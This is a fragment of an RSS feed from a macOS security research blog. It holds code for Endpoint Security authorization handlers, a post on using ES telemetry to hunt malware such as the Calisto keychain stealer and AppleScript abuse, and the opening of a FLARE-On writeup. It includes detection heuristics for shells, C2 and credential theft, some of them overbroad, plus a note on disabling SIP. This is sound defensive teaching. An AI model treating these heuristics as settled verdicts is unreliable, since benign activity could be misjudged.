<span class="hljs-keyword">es_new_client_result_t</span> ret = es_new_client(&amp;client,
    ^(<span class="hljs-keyword">es_client_t</span> *c, <span class="hljs-keyword">const</span> <span class="hljs-keyword">es_message_t</span> *m) {
        <span class="hljs-comment">// callback method</span>
        ...
    }
);
</code></pre>
<p>The <code>es_new_client</code> function creates a new Endpoint Security client and takes a block (essentially a lambda function in C) as an argument. This block will be called whenever an event occurs that the client has subscribed to. Once an Endpoint Security client is created, the system extension can subscribe to specific event types it wants to monitor:</p>
<pre><code class="lang-cpp"><span class="hljs-keyword">es_event_type_t</span> events[] = { ES_EVENT_TYPE_AUTH_EXEC, ES_EVENT_TYPE_NOTIFY_EXIT };
<span class="hljs-keyword">es_return_t</span> sret = es_subscribe(client, events, <span class="hljs-keyword">sizeof</span>(events) / <span class="hljs-keyword">sizeof</span>(events[<span class="hljs-number">0</span>]));
</code></pre>
<p>In this example, the system extension subscribes to the <code>ES_EVENT_TYPE_AUTH_EXEC</code> event type, which represents executable file execution, and <code>ES_EVENT_TYPE_NOTIFY_EXIT</code>, which notifies when a process exits.</p>
<p>When an event occurs that the client has subscribed to, the callback function registered with <code>es_new_client</code> is invoked. The callback function receives a pointer to the client and a pointer to the event message (<code>es_message_t</code>).</p>
<pre><code class="lang-cpp">(<span class="hljs-keyword">es_client_t</span> *c, <span class="hljs-keyword">const</span> <span class="hljs-keyword">es_message_t</span> *m) {
    <span class="hljs-comment">// check the event type</span>
    <span class="hljs-keyword">switch</span> (m-&gt;action_type) {
        <span class="hljs-keyword">case</span> ES_ACTION_TYPE_AUTH:
            <span class="hljs-comment">// handle authorization events</span>
            <span class="hljs-keyword">switch</span> (m-&gt;event_type) {
                <span class="hljs-keyword">case</span> ES_EVENT_TYPE_AUTH_EXEC:
                    <span class="hljs-comment">// handle executable file execution</span>
                    ...
                    <span class="hljs-comment">// respond with the authorization decision</span>
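                    es_respond_auth_result(c, m, ES_AUTH_RESULT_ALLOW, <span class="hljs-literal">false</span>); <span class="hljs-comment">// last argument: do not cache the result</span>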
                    <span class="hljs-keyword">break</span>;
                ...
            }
            <span class="hljs-keyword">break</span>;
        <span class="hljs-keyword">case</span> ES_ACTION_TYPE_NOTIFY:
            <span class="hljs-comment">// handle notification events</span>
            <span class="hljs-keyword">switch</span> (m-&gt;event_type) {
                <span class="hljs-keyword">case</span> ES_EVENT_TYPE_NOTIFY_EXIT:
                    <span class="hljs-comment">// handle process exit notification</span>
                    ...
                    <span class="hljs-keyword">break</span>;
                ...
            }
            <span class="hljs-keyword">break</span>;
        ...
    }
}
</code></pre>
<p>The callback function then checks the <code>action_type</code> of the event. If it's an authorization event (<code>ES_ACTION_TYPE_AUTH</code>), the function further inspects the <code>event_type</code> to determine the specific event, such as <code>ES_EVENT_TYPE_AUTH_EXEC</code> for executable file execution.</p>
<p>For authorization events, the system extension can make a decision to allow or deny the operation by calling <code>es_respond_auth_result</code> with the appropriate <code>ES_AUTH_RESULT_ALLOW</code> or <code>ES_AUTH_RESULT_DENY</code> value. For notification events (<code>ES_ACTION_TYPE_NOTIFY</code>), the system extension can perform any necessary actions, such as logging or cache invalidation, but cannot influence the event outcome.</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// an example handler to make auth (allow or block) decisions.</span>
<span class="hljs-comment">// returns either ES_AUTH_RESULT_ALLOW or ES_AUTH_RESULT_DENY.</span>
<span class="hljs-function"><span class="hljs-keyword">es_auth_result_t</span> <span class="hljs-title">auth_event_handler</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-keyword">es_message_t</span> *msg)</span> </span>{
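    <span class="hljs-keyword">switch</span> (msg-&gt;event_type) {
        <span class="hljs-keyword">case</span> ES_EVENT_TYPE_AUTH_OPEN: {
            <span class="hljs-comment">// note: AUTH_OPEN is answered with es_respond_flags_result, so the caller</span>
            <span class="hljs-comment">// maps a deny to "no flags allowed" instead of calling es_respond_auth_result</span>
            <span class="hljs-comment">// the process that triggered the event</span>
            <span class="hljs-keyword">const</span> <span class="hljs-keyword">es_process_t</span> *proc = msg-&gt;process;
            <span class="hljs-comment">// check if the process is an Endpoint Security client</span>
            <span class="hljs-keyword">if</span> (proc-&gt;is_es_client) {
                <span class="hljs-keyword">return</span> ES_AUTH_RESULT_ALLOW;
            }

            <span class="hljs-comment">// copy the paths out of their es_string_token_t (length + data) fields</span>
            <span class="hljs-keyword">char</span> filePath[PATH_MAX];
            <span class="hljs-keyword">char</span> exePath[PATH_MAX];
            <span class="hljs-keyword">const</span> <span class="hljs-keyword">es_string_token_t</span> *file = &amp;msg-&gt;event.open.file-&gt;path;
            <span class="hljs-keyword">const</span> <span class="hljs-keyword">es_string_token_t</span> *exe = &amp;proc-&gt;executable-&gt;path;
            <span class="hljs-built_in">snprintf</span>(filePath, <span class="hljs-keyword">sizeof</span>(filePath), <span class="hljs-string">"%.*s"</span>, (<span class="hljs-keyword">int</span>)file-&gt;length, file-&gt;data);
            <span class="hljs-built_in">snprintf</span>(exePath, <span class="hljs-keyword">sizeof</span>(exePath), <span class="hljs-string">"%.*s"</span>, (<span class="hljs-keyword">int</span>)exe-&gt;length, exe-&gt;data);
            <span class="hljs-comment">// check if the process is vim trying to access a text file</span>
            <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strstr</span>(exePath, <span class="hljs-string">"vim"</span>) &amp;&amp; <span class="hljs-built_in">strstr</span>(filePath, <span class="hljs-string">".txt"</span>)) {
                LOG_IMPORTANT_INFO(<span class="hljs-string">"BLOCKING OPEN: %s"</span>, filePath);
                <span class="hljs-keyword">return</span> ES_AUTH_RESULT_DENY;
            }

            <span class="hljs-comment">// all good</span>
            <span class="hljs-keyword">return</span> ES_AUTH_RESULT_ALLOW;
        }
        <span class="hljs-keyword">default</span>:
            <span class="hljs-keyword">return</span> ES_AUTH_RESULT_ALLOW;
    }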
}
</code></pre>
<p>One important aspect of the Endpoint Security API is the requirement to respond to authorization events by a specified deadline. If a system extension fails to respond in time, macOS may terminate the extension. There are a few solutions I've seen to overcome this.</p>
<p>You can set a timer to issue a "deny" response shortly before the deadline in case the main daemon fails to respond in time. The idea is to start a timer when you receive an authorization event. If the timer expires before your authorization logic completes, you automatically send a "deny" response to the Endpoint Security API. This ensures that you always respond before the deadline, preventing Apple from terminating your extension.</p>
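<pre><code class="lang-cpp"><span class="hljs-comment">// Start a watchdog timer when receiving an auth event</span>
<span class="hljs-comment">// secondsLeft (assumed): time until msg-&gt;deadline, converted from Mach absolute time to seconds</span>
<span class="hljs-comment">// A serial queue plus a flag makes sure the message is answered exactly once</span>
<span class="hljs-keyword">dispatch_queue_t</span> queue = dispatch_queue_create(<span class="hljs-string">"auth.watchdog"</span>, DISPATCH_QUEUE_SERIAL);
__block <span class="hljs-keyword">bool</span> responded = <span class="hljs-literal">false</span>;

<span class="hljs-keyword">dispatch_source_t</span> timer = dispatch_source_create(DISPATCH_SOURCE_TYPE_TIMER, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, queue);
dispatch_source_set_timer(timer, dispatch_time(DISPATCH_TIME_NOW, (<span class="hljs-keyword">int64_t</span>)(secondsLeft - <span class="hljs-number">2</span>) * NSEC_PER_SEC), DISPATCH_TIME_FOREVER, <span class="hljs-number">0</span>);
dispatch_source_set_event_handler(timer, ^{
    <span class="hljs-comment">// Time is up, deny the event unless a response already went out</span>
    <span class="hljs-keyword">if</span> (!responded) {
        responded = <span class="hljs-literal">true</span>;
        es_respond_auth_result(client, msg, ES_AUTH_RESULT_DENY, <span class="hljs-literal">false</span>);
    }
    dispatch_source_cancel(timer);
});
dispatch_resume(timer);

<span class="hljs-comment">// Run your authorization logic</span>
<span class="hljs-keyword">es_auth_result_t</span> result = auth_event_handler(msg);

<span class="hljs-comment">// If logic completes before the timer, cancel the timer and respond</span>
dispatch_sync(queue, ^{
    dispatch_source_cancel(timer);
    <span class="hljs-keyword">if</span> (!responded) {
        responded = <span class="hljs-literal">true</span>;
        es_respond_auth_result(client, msg, result, <span class="hljs-literal">false</span>);
    }
});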
</code></pre>
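<p>The snippet above treats <code>deadline</code> as a number of seconds. As far as I can tell, the <code>deadline</code> field on <code>es_message_t</code> is expressed in Mach absolute time ticks, so it has to be converted before it can be handed to a dispatch timer. Here is a minimal sketch of that arithmetic, assuming the current tick count comes from <code>mach_absolute_time()</code> and the numerator/denominator come from <code>mach_timebase_info()</code>. <code>watchdog_delay_ns</code> and its parameters are hypothetical names, not part of the ES API.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

// Hypothetical helper: how many nanoseconds from now a watchdog should fire.
// now_ticks and deadline_ticks are Mach absolute time values; numer and denom
// are the fields of mach_timebase_info_data_t. margin_ns is how early we want
// to fire (the snippet above uses 2 seconds).
uint64_t watchdog_delay_ns(uint64_t now_ticks, uint64_t deadline_ticks,
                           uint32_t numer, uint32_t denom,
                           uint64_t margin_ns)
{
    if (denom == 0 || deadline_ticks &lt;= now_ticks)
        return 0; // deadline already passed (or bad timebase): fire right away

    // Ticks to nanoseconds. Fine for the short windows involved here; a
    // production version should guard the multiplication against overflow.
    uint64_t remaining_ns = (deadline_ticks - now_ticks) * numer / denom;

    // Never wait past the deadline minus the safety margin.
    return remaining_ns &gt; margin_ns ? remaining_ns - margin_ns : 0;
}
</code></pre>
<p>The returned value can be used as the delta for <code>dispatch_time(DISPATCH_TIME_NOW, ...)</code> when arming the timer.</p>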
<p>Another approach is to perform your authorization logic asynchronously on a separate thread or queue. This way the handler returns immediately and never blocks the delivery of further events, while the asynchronous task makes the actual authorization decision and sends the response. Keep in mind that each authorization event can only be answered once, so the response has to come from the asynchronous task itself, and it still has to arrive before the deadline.</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// Keep the message alive after the handler returns (macOS 11+)</span>
es_retain_message(msg);

dispatch_async(dispatch_get_global_queue(QOS_CLASS_USER_INITIATED, <span class="hljs-number">0</span>), ^{
    <span class="hljs-comment">// Run your authorization logic on a separate queue</span>
    <span class="hljs-keyword">es_auth_result_t</span> result = auth_event_handler(msg);

    <span class="hljs-comment">// Send the one and only response for this event</span>
    es_respond_auth_result(client, msg, result, <span class="hljs-literal">false</span>);
    es_release_message(msg);
});
</code></pre>
<p>In this example, the handler only retains the message and hands it off. The authorization logic runs on a separate queue and responds once it reaches a decision. This can be combined with the watchdog timer above so that a slow decision still produces a response before the deadline.</p>
<p>Compared to KPIs, being an <code>EndpointSecurity</code> app in macOS has plenty of benefits, both from an agent protection/compatibility perspective and from a developer experience perspective. It's definitely the way the industry in general is moving, with major vendors like <a target="_blank" href="https://www.crowdstrike.com/blog/crowdstrike-supports-new-macos-big-sur/">Crowdstrike</a>, <a target="_blank" href="https://www.sentinelone.com/blog/going-kextless-why-we-all-need-to-transition-away-from-kernel-extensions/">SentinelOne</a>, and <a target="_blank" href="https://www.elastic.co/guide/en/security/current/endgame-sensor-full-disk-access.html#system-extension">Elastic</a> already supporting the new implementation.</p>
<p>But in the course of my research and work, I found that there are still a lot of endpoint security products not using the new System Extensions method. You can figure out which products are currently using System Extensions by using the <code>systemextensionsctl list</code> command.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1717523628859/098ecbdf-a433-4063-b33a-e6367c56236a.png" alt /></p>
<p>In macOS Ventura and above, if you still want to use security products that rely on the deprecated kernel extension methods, you can do so by going into RecoveryOS and enabling <code>Reduced Security</code> mode. This allows both EDR/DLP products and MDM products with kernel extensions to keep running on your system.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1717523755612/919d2bc8-6b0f-4933-913d-db2510afd345.png" alt class="image--center mx-auto" /></p>
<p>But this is truly a stopgap solution. If you are in a position where you have to compromise security because your vendor (which was already given around a four year transition window to adapt to the new standards) hasn't migrated to System Extensions, you should contact your principal or account manager immediately to pressure them to migrate. But your mileage may (most likely will) vary.</p>
]]></content:encoded></item><item><title><![CDATA[Introduction to the Apple Endpoint Security Framework]]></title><description><![CDATA[Cover Illustration by ireneparamithaa

For years there are two camps of perception in MacOS security, those who think that Macs are impenetrable boxes by design and sysadmins who are constantly horrified by the lack of protections that MacOS has desp...]]></description><link>https://research.meekolab.com/introduction-to-the-apple-endpoint-security-framework</link><guid isPermaLink="true">https://research.meekolab.com/introduction-to-the-apple-endpoint-security-framework</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Fri, 26 Jan 2024 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1707293858941/78ff9e37-d7be-4fd5-94d5-2e551c729eee.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by ireneparamithaa</em></strong></p>
</blockquote>
<p>For years there have been two camps of perception in MacOS security: those who think that Macs are <a target="_blank" href="https://www.makeuseof.com/tag/macs-likely-malware-windows/">impenetrable boxes</a> by design, and sysadmins who are constantly horrified by the <a target="_blank" href="https://www.sentinelone.com/blog/mac-admins-why-apples-silent-approach-to-endpoint-security-should-be-a-wake-up-call/">lack of protections</a> that MacOS has despite being a more locked-down platform than Windows. For a time these two camps coexisted simply because MacOS was never an attractive platform for threat actors to attack due to its low adoption rate.</p>
<p>But as Apple's market share grows, especially in the enterprise market and particularly in tech firms, more and more complex malware is beginning to target MacOS systems. The SmoothOperator 3CX supply chain compromise and Lockbit's foray into Mac ransomware are evidence that many threat actors are now moving toward Mac as a platform to attack.</p>
<p>For a time, Apple allowed third party code, especially security products, to run in kernel-land via kexts (Kernel Extensions), which if you come from the <a target="_blank" href="https://medium.com/macoclock/what-are-kexts-in-macos-or-hackintoshes-kextcache-58082d6a97a9#:~:text=Kext%20files%20are%20essential%20drivers,sound%2C%20ethernet%2C%20and%20more.">Hackintosh scene</a> might bring parallels to how drivers work in Windows. I have written extensively about how this approach in Windows <a target="_blank" href="https://blog.maikxchd.com/analyzing-genshin-impacts-anticheat-module">didn't really work out well</a>: giving programmers the ability to run code inside the kernel (even trusted developers that are vetted through programs such as WHQL) can sometimes bring unintended consequences.</p>
<p>Apple's Endpoint Security Framework (ES) is a C API made by Apple as a solution for EDR/AV vendors to monitor OS telemetry events from userspace, similar to Windows ETW-TI. Since the introduction of the ES API, monitoring technologies built on kexts, which cannot run under the default Full Security level in iBoot, have become largely outdated. This shift is evident in the XNU source code, where developers have introduced the <code>__kpi_deprecated(_msg)</code> macro, which generates compile-time warnings advising the use of EndpointSecurity instead.</p>
<h1 id="heading-a-more-open-endpoint-security-standard">A More Open Endpoint Security Standard</h1>
<p>Similar to Microsoft's approach in Windows via <a target="_blank" href="https://blog.maikxchd.com/introduction-into-microsoft-threat-intelligence-drivers-etw-ti">ETW-TI</a>, ES provides a way for EDR/AV systems to run with user-mode privileges while still retaining the security and protection they enjoyed when running in kernel space.</p>
<p>For your userspace app to successfully register with the ES API, it must be signed with the <code>com.apple.developer.endpoint-security.client</code> entitlement, which has to be granted by <a target="_blank" href="https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_developer_endpoint-security_client">Apple</a> via the <a target="_blank" href="https://developer.apple.com/contact/request/system-extension/">Apple Developer System Extensions Request Form</a>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1707294060483/421662d3-a26b-415a-95ff-ec2cfd1195de.jpeg" alt class="image--center mx-auto" /></p>
<p>This is kinda similar to the requirements for Early Launch Anti-Malware (ELAM) drivers, which must adhere to specific program requirements set by Microsoft, including being signed by the Windows Hardware Quality Lab (WHQL) and the necessity for antimalware vendors to be part of the <a target="_blank" href="https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/virus-initiative-criteria?view=o365-worldwide">Microsoft Virus Initiative (MVI)</a> to participate in the ELAM program.</p>
<p>Of course, while Apple is selective about who can get access to ES, it is still more open than the standard set by Microsoft, where you need to be an MVI vendor to build an <a target="_blank" href="https://learn.microsoft.com/en-us/windows-hardware/drivers/install/elam-prerequisites">ELAM driver</a>.</p>
<h1 id="heading-general-architecture-overview">General Architecture Overview</h1>
<p>There are four main components of ES:</p>
<ul>
<li><p><code>libEndpointSecuritySystem.dylib</code></p>
<p>  This is a userland dynamic library that Apple uses to link MacOS components to the ES API so they can emit events into <code>EndpointSecurity.kext</code>. It allows system binaries to emit ES events around background task management, XProtect detection events, sudo invocation, TouchID usage, screensharing/recording activity, and OpenSSH logins</p>
</li>
<li><p><code>libEndpointSecurity.dylib</code></p>
<p>  This is a userland dynamic library for developers working with ES. It safely exposes several abilities reserved for <code>EndpointSecurity.kext</code> to third party applications via an API, so when developers build against the ES API with the required entitlement, they link against <code>libEndpointSecurity.dylib</code>. Doing this allows apps to subscribe to ES events, apply path muting, and authorize system activity</p>
</li>
<li><p><code>endpointsecurityd</code></p>
<p>  This is a userland daemon that validates the system extensions that use ES by checking their privileges, enables the installation/uninstallation of the extension, registers the system extension as an early boot process (with <code>NSEndpointSecurityEarlyBoot</code> in <code>Info.plist</code>, similar to ELAM on Windows), and records analytics through the CoreAnalytics framework</p>
</li>
<li><p><code>EndpointSecurity.kext</code></p>
<p>  This is a kernel extension made by Apple that proxies requests from ES API system extensions in userspace through Apple's own kernel drivers, which gives more security and control than letting applications hook into the XNU kernel themselves</p>
</li>
</ul>
<p>ES events come both from hooking the system calls behind kernel-level events and from the <code>libEndpointSecuritySystem.dylib</code> dynamic library for system components, which works at a much higher level of abstraction. Processes that do not have the <code>com.apple.private.endpoint-security.submit</code> entitlement are explicitly forbidden from submitting ES events to <code>EndpointSecurity.kext</code>, to protect the integrity of ES event logs.</p>
<h1 id="heading-es-events-for-threat-hunting">ES Events for Threat Hunting</h1>
<p>Building your own system extension and a pipeline to display its output might be trivial for some individuals, but the entitlement needed from Apple is a barrier that keeps many from using this API. A way to circumvent this is to create a system extension that queries the ES API without the entitlement and run it with System Integrity Protection (SIP) <a target="_blank" href="https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection">disabled</a>, but in a forensics or incident response scenario this might contaminate the endpoint. This is where <a target="_blank" href="https://github.com/redcanaryco/mac-monitor">Mac Monitor</a> by Red Canary comes in.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703876216653/ed3f8e47-9495-4cb2-a75d-2990e73ef77a.png" alt class="image--center mx-auto" /></p>
<p>Mac Monitor allows us to read ES events in an enriched way, and also gives us a graphical user interface and a set of event filters that let us focus on specific events. In a way, this is a more beefed up version of Windows <a target="_blank" href="https://learn.microsoft.com/en-us/sysinternals/downloads/procmon">Process Monitor</a>.</p>
<h3 id="heading-searching-for-programs-with-malicious-activity">Searching for Programs with Malicious Activity</h3>
<p>To demonstrate the value of ES for threat hunting, we can detonate a sample in a VM. I'm gonna use the Calisto malware, accessible via the Objective See Foundation <a target="_blank" href="https://objective-see.org/malware.html">Mac Malware Collection</a>. Calisto is an infostealer that masquerades as an installer for Intego's Mac Internet Security X9, a personal security product for MacOS.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703877052485/737066bb-53c8-4836-acb3-e43fc9a0a3a2.png" alt class="image--center mx-auto" /></p>
<p>Upon execution, we can open Mac Monitor to check for any suspicious events. We can immediately see that the installer is flagged by ES.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703877156113/3c822b01-3fa7-41b0-8a4c-b1481d93e8f2.png" alt class="image--center mx-auto" /></p>
<p>Looking deeper, we can see that this is flagged as an <code>ES_EVENT_TYPE_NOTIFY_EXEC</code> event, which notifies ES clients that a process is executing an image. By itself it's not supposed to be something suspicious, but what makes it pop out is that the application is not signed at all. Considering this is supposedly a legitimate security product with hooks into MacOS, it's unusual for it to have no codesigning whatsoever.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703877140963/366fb56e-7ac5-44e3-b893-f515effcb0e3.png" alt class="image--center mx-auto" /></p>
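<p>Mac Monitor surfaces the signing state for us, but the same check can be done on the raw event. Here is a rough sketch, assuming the code signing flags reported for the process in the exec event carry the kernel's <code>CS_*</code> bits. The constants below are copied from XNU's <code>cs_blobs.h</code> as I understand them, and <code>classify_signature</code> is a made-up helper, not an ES API.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

// Code signing bits, mirrored here from XNU's osfmk/kern/cs_blobs.h so the
// example builds anywhere. Double-check them against your SDK before use.
#define CS_VALID  0x00000001u /* signature is currently valid */
#define CS_ADHOC  0x00000002u /* ad hoc signed, no certificate chain */
#define CS_SIGNED 0x20000000u /* process has a signature (may be invalid) */

typedef enum { SIG_UNSIGNED, SIG_ADHOC, SIG_INVALID, SIG_VALID } sig_state_t;

// Hypothetical helper: bucket a process by its code signing flags.
sig_state_t classify_signature(uint32_t cs_flags)
{
    if (!(cs_flags &amp; CS_SIGNED))
        return SIG_UNSIGNED; // no signature at all, like the installer above
    if (cs_flags &amp; CS_ADHOC)
        return SIG_ADHOC;    // signed, but not tied to any developer identity
    if (!(cs_flags &amp; CS_VALID))
        return SIG_INVALID;  // had a signature that is no longer valid
    return SIG_VALID;
}
</code></pre>
<p>Anything that lands in the unsigned or ad hoc bucket while claiming to be a commercial security product deserves a closer look.</p>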
<p>Digging into the event correlation tab, we can see several events correlated with the application in question. Since Calisto is an old malware from 2018, we can see the things that it does in <a target="_blank" href="https://securelist.com/calisto-trojan-for-macos/86543/">writeups</a> that people have made. Since System Integrity Protection is enabled on the VM, we can only see the events that correspond to the malware's infostealing functions.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703877394986/dccf7850-51f8-413d-8463-92ff0f83275e.png" alt class="image--center mx-auto" /></p>
<p>From the <a target="_blank" href="https://developer.apple.com/documentation/endpointsecurity/es_event_type_t">ES_EVENT</a> types we can find the following</p>
<ul>
<li><p><a target="_blank" href="https://developer.apple.com/documentation/endpointsecurity/es_event_type_t/es_event_type_auth_create"><code>ES_EVENT_TYPE_AUTH_CREATE</code></a> This event records all file creation operations, and here it shows the creation of a hidden folder named <code>.calisto</code> in the main user directory</p>
</li>
<li><p><a target="_blank" href="https://developer.apple.com/documentation/endpointsecurity/es_event_type_t/es_event_type_auth_copyfile"><code>ES_EVENT_TYPE_AUTH_COPYFILE</code></a> and <a target="_blank" href="https://developer.apple.com/documentation/endpointsecurity/es_event_type_t/es_event_type_auth_mmap"><code>ES_EVENT_TYPE_AUTH_MMAP</code></a> These events show that the program is copying data from the MacOS Keychain and Google/Safari browsing data</p>
</li>
</ul>
<p>Peeking in the directory will reveal that inside <code>.calisto</code> there is a zip file called <code>KC.zip</code> which contains a full duplicate of the MacOS Keychain folder</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703909545675/34937b32-7b9c-4b27-bbca-2ab2210f31dd.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-searching-for-malicious-code-execution">Searching for Malicious Code Execution</h3>
<p>Another thing we can simulate and hunt through ES is suspicious code execution, and for this we can use <a target="_blank" href="https://github.com/redcanaryco/AtomicTestHarnesses/tree/master/posix">Posix Atomic Test Harness</a> to simulate the abuse of AppleScript, a scripting language for macOS that allows control over applications and parts of the operating system through inter-application messages called AppleEvents. It can be used to locate open windows, send keystrokes, and interact with almost any open application either locally or remotely.</p>
<p>Scripts can be executed in various ways: from the command line using <code>osascript</code>, within Mach-O binaries using macOS native APIs like <code>NSAppleScript</code> or <code>OSAScript</code>, or even as plain text shell scripts.</p>
<p>Atomic <code>posixath</code> includes tests for different execution methods of AppleScript, such as through the <code>NSAppleScript</code> API, the command-line utility <code>osascript</code>, shell scripts with a shebang (<code>#!/usr/bin/osascript</code>), and as part of applets or stay-open-scripts. These tests are crucial for understanding how AppleScript can be used (or abused) in various scenarios, including benign automation tasks or potentially malicious activities.</p>
<p>Upon execution, we found that the script works as expected and unimpeded.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703922012987/5aa479ed-8838-4959-8008-95203f73811c.png" alt class="image--center mx-auto" /></p>
<p>But upon looking in Mac Monitor, we can see that the event is logged, and macOS has flagged the "applet" process.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703921653306/c7ecd5c8-1d73-4e3a-8699-7c52a24323c9.png" alt class="image--center mx-auto" /></p>
<p>Reading into it, we can also see the complete process execution chain, which helps threat detection by showing where the malicious execution originates and where it ends up.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703921665396/1306133b-b32e-4d62-a864-2729af95ec34.png" alt class="image--center mx-auto" /></p>
<p>Blocking more esoteric attack methods is key to improving EDR products on MacOS, especially knowing how built-in solutions like Gatekeeper and XProtect can sometimes be <a target="_blank" href="https://www.sentinelone.com/blog/mac-admins-why-apples-silent-approach-to-endpoint-security-should-be-a-wake-up-call/">iffy at blocking</a> threats. While enabling SIP and Gatekeeper can stop around 80% of attacks, there will always be those weirder attack chains that EDRs need more advanced telemetry sources to detect.</p>
<h3 id="heading-other-smoking-guns-in-es-logs">Other Smoking Guns in ES Logs</h3>
<p>While the events above show entry points for you to start your threat hunting journey, there are other events of interest from a threat hunting perspective that provide clear "smoking guns" in your investigation. You can filter for and target these specific event types for threat detection. This list was gathered by testing different C2 platforms such as SliverC2, CobaltStrike (via Geacon), and MacShellSwift.</p>
<ul>
<li><p><code>ES_EVENT_TYPE_NOTIFY_FCNTL</code> Records the manipulation of a file descriptor, most of the time to get the file flag indicating a process is trying to gain dynamic access.</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_READLINK</code> Records symlink reading operations, and most of these operations involve reading the link to <code>/etc/</code>, so any READLINK operation that doesn't point from SYSTEM to <code>/etc/</code> should be considered malicious.</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_MMAP</code> Records memory mapping operations on the system where it's possible to identify weird mappings that may be indicative of malicious activity.</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_MPROTECT</code> Records all memory protection events, which can be seen as anomalous when run by interesting processes such as memory protection assigned to <code>/bin/sh</code>.</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_IOKIT_OPEN</code> Records all processes that open an IOKit device, which can be useful in detecting malicious code that's performing screen capture or webcam monitoring operations, since these require IOKit devices related to hardware graphics acceleration. These events are usually triggered in a stream until the operation is finished, so if you see an application using this IOKit device while you are not using your webcam or screensharing, there is a big chance that you're actually being monitored.</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_PTY_GRANT</code> Records all processes that grant a pseudoterminal device to a user, which is used to create a communication channel between a controlling terminal and a slave terminal. This is usually used to generate interactive shell instances and is rarely a normal system operation, so its appearance should be a red flag.</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_SETMODE</code> Records changes in file access permissions via utilities like <code>chmod</code>, which we can use to monitor for access changes on non-standard binaries (anything other than system binaries like <code>/bin/bash</code> or developer tools like Xcode) that may indicate malicious activity.</p>
</li>
</ul>
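<p>As an illustration of how one of these can be turned into a triage rule, here is a small sketch for the SETMODE case: flag a permission change that makes a file executable when the file lives outside a list of expected locations. The allowlist and the <code>setmode_is_suspicious</code> helper are assumptions for the example, and the path and mode would come from the event's target file and new mode in a real ES client.</p>
<pre><code class="lang-c">#include &lt;stdbool.h&gt;
#include &lt;stddef.h&gt;
#include &lt;string.h&gt;

// Directories treated as "expected" places for executables. This allowlist
// is an assumption for illustration; tune it for your own fleet.
static const char *const SYSTEM_PREFIXES[] = {
    "/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/System/",
    "/Applications/Xcode.app/",
};

// Any execute bit: owner, group, or other (S_IXUSR | S_IXGRP | S_IXOTH).
#define ANY_EXEC_BITS 0111u

// Hypothetical triage helper for SETMODE events: returns true when a chmod
// adds an execute bit to a file outside the allowlisted prefixes.
bool setmode_is_suspicious(const char *path, unsigned mode)
{
    if (path == NULL || (mode &amp; ANY_EXEC_BITS) == 0)
        return false; // nothing is being made executable

    size_t count = sizeof(SYSTEM_PREFIXES) / sizeof(SYSTEM_PREFIXES[0]);
    for (size_t i = 0; i &lt; count; i++) {
        if (strncmp(path, SYSTEM_PREFIXES[i], strlen(SYSTEM_PREFIXES[i])) == 0)
            return false; // expected location
    }
    return true;
}
</code></pre>
<p>A rule like this is noisy on developer machines, so treat a hit as a lead to correlate with the other events in this list rather than as a verdict.</p>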
<h1 id="heading-conclusion">Conclusion</h1>
<p>ES provides a multifaceted approach to threat detection and response. It serves as a powerful tool for monitoring system events for signs of malicious activity, enabling registered clients to receive notifications of such events. This functionality is crucial for developing advanced EDR solutions that can effectively monitor and, when necessary, block system events to conform to security policies and protect against potential threats.</p>
<p>From a threat detection perspective, the ES framework is instrumental in macOS security. Its capabilities extend beyond mere notification of events; it allows for a proactive stance in security management. For example, with authorization events, ES enables applications to take pre-emptive actions against potentially harmful processes. This feature is critical in stopping threats before they materialize into actual breaches or system compromises.</p>
<p>The existence of tools like Red Canary Mac Monitor also shrinks the skill gap required to do threat analysis in MacOS, which I honestly think is about time. I'm too bored doing detection engineering in Windows and with ES and tools like Mac Monitor I think MacOS Detection Engineering has a bright future.</p>
]]></content:encoded></item><item><title><![CDATA[A Shitty FLARE-On 10 Writeup for Challenge 4 (Aimbot)]]></title><description><![CDATA[Cover Illustration by mocapoca_, the illustration is purchasable via https://twitter.com/mocapoca_/status/1728761352469324072 (Indonesian only)

This is a write up of FLARE-ON Challenge 4, which is unfortunately where I stopped doing the challenges d...]]></description><link>https://research.meekolab.com/a-shitty-flare-on-10-writeup-for-challenge-4-aimbot</link><guid isPermaLink="true">https://research.meekolab.com/a-shitty-flare-on-10-writeup-for-challenge-4-aimbot</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Wed, 24 Jan 2024 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1701973249460/5353a445-66dd-404b-8420-e43e9b06c5ad.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
